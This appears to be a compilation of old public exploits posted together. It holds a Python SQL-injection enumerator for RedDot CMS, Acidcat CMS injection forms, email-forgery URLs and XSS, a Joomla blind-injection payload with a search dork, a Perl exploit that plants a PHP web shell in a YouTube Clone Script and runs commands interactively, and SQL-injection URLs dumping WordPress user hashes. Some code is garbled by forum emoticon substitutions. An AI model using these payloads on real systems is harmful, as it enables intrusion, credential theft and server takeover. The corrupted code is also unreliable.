#!/usr/bin/env python

# un-comment your selection.

import urllib2
import urllib
import string
import getopt
import sys

def banner():
print
print "RED DOT CMS 7.5 database enumeration"
print "by Mark Crowther and Rodrigo Marcos"

def usage():
print
print "usage():"
print "python RD_POC.py [options] URL"
print
print " [options]"
print " --dbenum: Database enumeration"
print " --tableenum: Table enumeration, use -d to specify database"
print " --colenum: Column enumeration, use -d to specify database and -t to specify table"
print " --dataenum: Data enumeration, use -d to specify database, -t to specify table and -c to specify a column"
print " -d: Specify a database"
print " -t: Specify a table"
print " -c: Specify a column"
print " -h: Help page"
print
print "Examples: "
print " python RD_POC.py --dbenum http://myhost/cms/"

print " python RD_POC.py --tableenum -d IoAdministration http://myhost/cms/"

print " python RD_POC.py --colenum -d IoAdministration -t IO_USR http://myhost/cms/"

print " python RD_POC.py --dataenum -d IoAdministration -t IO_USR -c USR2 http://myhost/cms/"

print
sys.exit()

def retrievedata(url1, url2 = "' ORDER BY 1;-- &DisableAutoLogin=1"):
stop = 0

current = ''

while (stop==0):

request = url1 + current + url2

request = string.replace(request, ' ', '%20')
req = urllib2.Request(request)
try:
r = urllib2.urlopen(req)
except urllib2.URLError, msg:
print "[+] Error: Error requesting URL (%s)" % msg
result = r.read()

#print result
if string.find(result, ' Description Conversion failed when converting the ') == -1:
stop = 1
else:
start = string.find(result, "'") + 1
end = string.find(result[start:], "'") + start
current = result[start:end]
print current


def dbenum():

retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYS.SYSDATABASES where name> '")

def tableenum(database=''):

if database=='':
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '")

else:
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSOBJECTS where xtype=char(85) and name> '")

def colenum(table, database=''):

if table=='':
usage()

if database=='':
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSCOLUMNS where name > '", "' AND id = (SELECT id from SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")
else:
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSCOLUMNS where name > '","' AND id = (SELECT id from " + database + "..SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")


def dataenum(column, table, database=''):

if column=='' or table=='':
usage()

if database=='':
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + table + " WHERE " + column + "> '")

else:
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + database + ".." + table + " WHERE " + column + "> '")


banner()
pdbenum = 0
ptableenum = 0
pcolenum = 0
pdataenum = 0
database = ''
table = ''
column = ''

url = sys.argv[len(sys.argv)-1]

try:
opts, args = getopt.getopt(sys.argv[1:], "d:t:c:h:", ["help", "dbenum", "tableenum", "colenum", "dataenum"])
except getopt.GetoptError:
usage()

try:
for o, a in opts:
if o in ("-h", "--help"):
usage()
if o == "--dbenum":
pdbenum = 1
if o == "--tableenum":
ptableenum = 1
if o == "--colenum":
pcolenum = 1
if o == "--dataenum":
pdataenum = 1
if o == "-d":
database = a
if o == "-t":
table = a
if o == "-c":
column = a
except:
usage()


if pdbenum == 1:
print 'Enumerating databases:'
dbenum()
elif ptableenum == 1:
print 'Enumerating tables:'
tableenum(database)
elif pcolenum == 1:
print 'Enumerating columns:'
colenum(table, database)
elif pdataenum == 1:
print 'Enumerating data:'
dataenum(column, table, database)
else:
usage()
-----------------------------------------------------------------
DaRkLiFe is Watching 8-)

################################################## ################################
# AmnPardaz Security Research Team
#
# Title: Acidcat CMS Multiple Vulnerabilities.
# Vendor: http://www.acidcat.com
# Vulnerable Version: 3.4.1
# Exploit: Available
# Impact: High
# Fix: N/A
################################################## #################################


####################
1. Description:
####################
Acidcat CMS is a web site and simple Content Management System that can be administered via a web browser.

####################
2. Vulnerability:
####################
2.1. There is a SQL Injection in "default.asp". By using it, attacker can gain usernames and encrypted passwords.
2.1.1. POC:
Check the exploit section.
2.2. There is a logical vulnerability in which attacker can send email by the site without any permission.
2.2.1. POC:
Check the exploit section.
2.3. There is a SQL Injection in "main_login2.asp". By using it, attacker can login to the site.
2.3.1. POC:
Check the exploit section.
2.4. There is a XSS in "/admin/admin_colors_swatch.asp".
2.4.1. POC:
/admin/admin_colors_swatch.asp?field=value='';}alert('XSS ');function(){myForm.myText
2.5. There is a FckEditor which has no permission, and attacker can upload his/her file.
2.5.1. POC:
/admin/fckeditor/editor/filemanager/connectors/test.html
####################
3. Exploits:
####################

Original Exploit URL: http://bugreport....6/exploit


3.1. Attacker can gain usernames and passwords:
-------------
<form action="http://[The URL]/default.asp?formType=&itemID=" method="post">
<input type="text" name="cID" id="cID" value="-1 union select 1,username,3,password,5,6,7,8,9,10,'1-1-2000','1-1-2010' from ac_user" />


<input type="submit" value="Submit" />
</form>

-------------
3.2. Attacker can send email without any permission:
-------------
default_mail_aspemail.asp? AcidcatSend=1&From=&FromName=FakeAdmin&To=&Subject =Forgery&Body=Change your password to 123456!

default_mail_cdosys.asp? AcidcatSend=1&From=&FromName=FakeAdmin&To=&Subject =Forgery&Body=Change your password to 123456!

default_mail_jmail.asp? AcidcatSend=1&From=&FromName=FakeAdmin&To=&Subject =Forgery&Body=Change your password to 123456!
-------------
3.3. Attacker can login to the site:
-------------
<form action="main_login2.asp" method="post">
<input type="hidden" name="username" id="username" value="FooNot' union select 1,2,3,'%CE%10%C9%CE%AC%0F%F3%07A%91%8B%1B%9FF%2D%D F%EBcO%9Au%5F%28%80%A5%0D%D0%89%EA%EF%3E%BB%BDx%5F %0EM%7C%09%2C%B6s%9D%EAa%2FqX%7E%08%05%CAZ%26%1ET% 10%CE' from ac_user where Username='1'or'1'='1'or'1'='1" size="200"/>


<input type="hidden" name="password" id="password" value="0" />


<input type="submit" value="Click To Login!" />

################################################## #######
# #
# Joomla Component Profiler Blind SQL Injection #
# #
################################################## #######


########################################

[~] ScriptName: "Joomla"
[~] ModuleName: "Profiler"
[~] Version: ?

########################################

[~] DORK: allinurl:com_comprofiler

########################################

[~] Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
[~] Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*

######################################## :arrow: :arrow: :arrow: :arrow: :arrow: :arrow:

#!/usr/bin/perl
#inphex
#/siteadmin/spages.php
# include("../include/config.php"Wink;
# include("../include/function.php"Wink;
#
# if($_REQUEST['update'])
# {
# $file_path = $config['BASE_DIR']."/templates/".$_REQUEST['page'];
# if(file_exists($file_path))
# {
# $handle = fopen($config['BASE_DIR']."/templates/".$_REQUEST['page'], "w"Wink;
# fwrite($handle,stripslashes($_POST['body']));
# fclose($handle);
# $msg = "Page updated successfully";
# }
# else
# $err = "Page does not exist";
# }
#
# STemplate::assign('msg',$msg);
# STemplate::assign('err',$err);
# STemplate:Grinisplay("siteadmin/spages.tpl"Wink;
#
#Very easy one...
#YouTube-Clone-Script is quite buggy,there are more bugs.

use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;

print "usage: $0 http://host /path/\n";
$info{'info'} = {
"author" => ["inphex"],
"name" => ["YouTube Clone Script Remote Code Execution"],
"version" => [],
"description" => ["This Script will exploit a Remote Code Execution vulnerability existing in the YouTube Clone Script\n"],
"options" =>
{
"agent" => "",
"proxy" => "",
"default_headers" => [
["key","value"]],
"timeout" => 2,
"cookie" =>
{
"cookie" => ["key=value"],
},
},
"sending_options" =>
{
"host" => $host_,
"path" => $path_."siteadmin/spages.php",
"port" => 80,
"method_a" => "REMOTE_CHECK",
"attack" =>
{
"update" => ["get","update","1"],
"path" => ["get","page","../about.php"],
"content" => ["post","body","<?php echo system(\$_GET[cmd]); ?>"],
},
},

};
&start($info{'info'},222);
do {
print "\$";$cmd = <STDIN>;chomp($cmd);
$info{'info'} = { "options" =>{"agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 2, "cookie" => {"cookie" => ["key=value"],},},"sending_options" =>{"host" => $host_, "path" => $path_."about.php", "port" => 80, "method_a" => "CODE_EXECUTION", "attack" =>{"cmd" => ["get","cmd",$cmd], },},};
&start($info{'info'},221);
$content = ${$info{'info'}}{221}{'content'};
print $content;
print "\n";
} while (1);
sub start
{
$a_ = shift;
@EXPORT = qw( start $return $a_ );
$id = shift;
$get_dA = get_d_p_s("get"Wink;
$post_dA = get_d_p_s("post"Wink;
my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
my $jj = 1;
my $ii = 48;
my $hh = 1;
my $ppp = 0;
my $s = shift;
my $a = "";
my $res_p = "";
my $h = "";
($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xds jaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
$ua = LWP::UserAgent->new;
$ua->timeout($a_->{'options'}{'timeout'});
if ($a_->{'options'}{'proxy'}) {
$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
}
$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
$ua->agent($agent);
{
while (($k,$v) = each(%{$a_}))
{
if ($k ne "options" && $k ne "sending_options"Wink
{
foreach $r (@{$a_->{$k}})
{
if ($a_->{$k}[0])
{
print $k.":".$a_->{$k}[0]."\n";
}
}
}
}


foreach $j (@{$a_->{'options'}{'default_headers'}})
{
$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
$m++;
}

if ($a_->{'options'}{'cookie'}{'cookie'}[0])
{
$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
}



}
switch ($method_m)
{
case "attack" { &attack();}
case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
case "REMOTE_COMMAND_EXECUTION" { &attack();}
case "REMOTE_CODE_EXECUTION" {&attack();}
case "REMOTE_FILE_INCLUSION" { &attack();}
case "LOCAL_FILE_INCLUSION" { &attack(); }
else { &attack(); }

}


sub attack
{

if ($post_dA eq ""Wink {
$method = "get";
} elsif ($post_dA ne ""Wink
{
$method = "post";
}
if ($method eq "get"Wink {
$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$ get_dA);
${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne ""Wink
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
} elsif ($method eq "post"Wink
{
$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?". $get_dA,"application/x-www-form-urlencoded",$post_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne ""Wink
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
}

}
sub sql_injection_blind
{
while ()
{
while ($ii <= 90)
{
if(check($ii,$hh) == 1)
{
syswrite STDOUT,lc(chr($ii));
$hh++;
$chr = $chr.chr($ii);
}
$ii++;
}
push(@ffs,length($chr));
if (($#ffs -1) == $ffs)
{
print "\nFinished/Error\n";
exit;
}
$ii = 48;
}
}
sub check($$)
{
$ii = shift;
$hh = shift;
if (get_d_p_s("post"Wink ne ""Wink
{
$method = "post";
} else { $method = "get";}
if ($method eq "get"Wink
{
$ppp++;
$query = modify($get_dA,$ii,$hh);
print $ii."-".$hh."\n";
$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
} elsif ($method eq "post"Wink
{
$ppp++;
$query_g = modify($get_dA,$ii,$hh);
$query_p = modify($post_dA,$ii,$hh);

$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"applica tion/x-www-form-urlencoded",$query_p);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
}
}
sub modify($$$)
{
$string = shift;
$replace_by = shift;
$replace_by1 = shift;

if ($string !~/\$i/ && $string !~/\$h/) {
print $string;
} elsif ($string !~/\$i/)
{
$ff = substr($string,0,index($string,"\$h"Wink);
$ee = substr($string,rindex($string,"\$h"Wink+2);
$string = $ff.$replace_by1.$ee;

return $string;
} elsif ($string !~/\$h/)
{
$f = substr($string,0,index($string,"\$i"Wink);
$e = substr($string,rindex($string,"\$i"Wink+2);
$string = $f.$replace_by.$e;
return $string;
} else
{
$f = substr($string,0,index($string,"\$i"Wink);
$e = substr($string,rindex($string,"\$i"Wink+2);
$string = $f.$replace_by.$e;

$ff = substr($string,0,index($string,"\$h"Wink);
$ee = substr($string,rindex($string,"\$h"Wink+2);
$string = $ff.$replace_by1.$ee;

return $string;
}
}
sub get_d_p_s
{
$g_d_p_s = shift;
$post_data = "";
$get_data = "";
$header_data = "";
%header_dA = ();
while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
{
if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get"Wink
{

$method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post"Wink
{
$method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header"Wink
{
$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
}
$hp++;
}
$yy = $#get;
while ($bb <= $#get)
{
$get_data .= $get[$yy]."&";
$bb++;
$yy--;
}
$l = $#post;
while ($k <= $#post)
{

$post_data .= $post[$l]."&";
$k++;
$l--;
}
if ($g_d_p_s eq "get"Wink
{

return $get_data;
}
elsif ($g_d_p_s eq "post"Wink
{
return $post_data;
} elsif ($g_d_p_s eq "header"Wink
{
return %header_dA;
}
}
sub get_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
%hash = get_d_p_s("header"Wink;
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
return $req->content;
}
sub post_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
$content_type = shift;
$send = shift;
%hash = get_d_p_s("header"Wink;
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
$req->content_type($content_type);
$req->content($send);
$res = $ua->request($req);
return $res->content;
}

}

================================================== =======
=============== JIKI TEAM [ Maroc And YameN ]===============
================================================== =======
# Author : jiko
# Script : E RESERV VERSION 2.1
# Bug : Remote SQL Injection Vulnerability
# Download : http://cogites.co...hp?num=21

=========================JIkI Team===================
# Exploit :
http://[Site]/[script]/index.php?ID_loc=[sql]
# Ex :
http://[Site]/[script]/index.php?ID_loc=-1 union select version()--
At Office Site
http://cogites.co...%20version()--
================================================== =======
greetz:
all my friend and H-T Team and all No-back members and tryag.Com
visit: http://www.no-back.org & http://www.tryag.com
================================================== =======

===========================================
There's standart sql-injection in Spreadsheet <= 0.6 Plugin
# Author : 1ten0.0net1
# Script : Wordpress Plugin Spreadsheet <= 0.6 v.
# Download : http://timrohrer....age_id=71

# BUG : Remote SQL-Injection Vulnerability
# Dork : inurl:/wp-content/plugins/wpSS/
Example:
http://site.com/w..._id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4+from+wp_users--&display=plain
===========================================
Vulnerable code:
ss_load.php
$id = $_GET['ss_id'];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {
....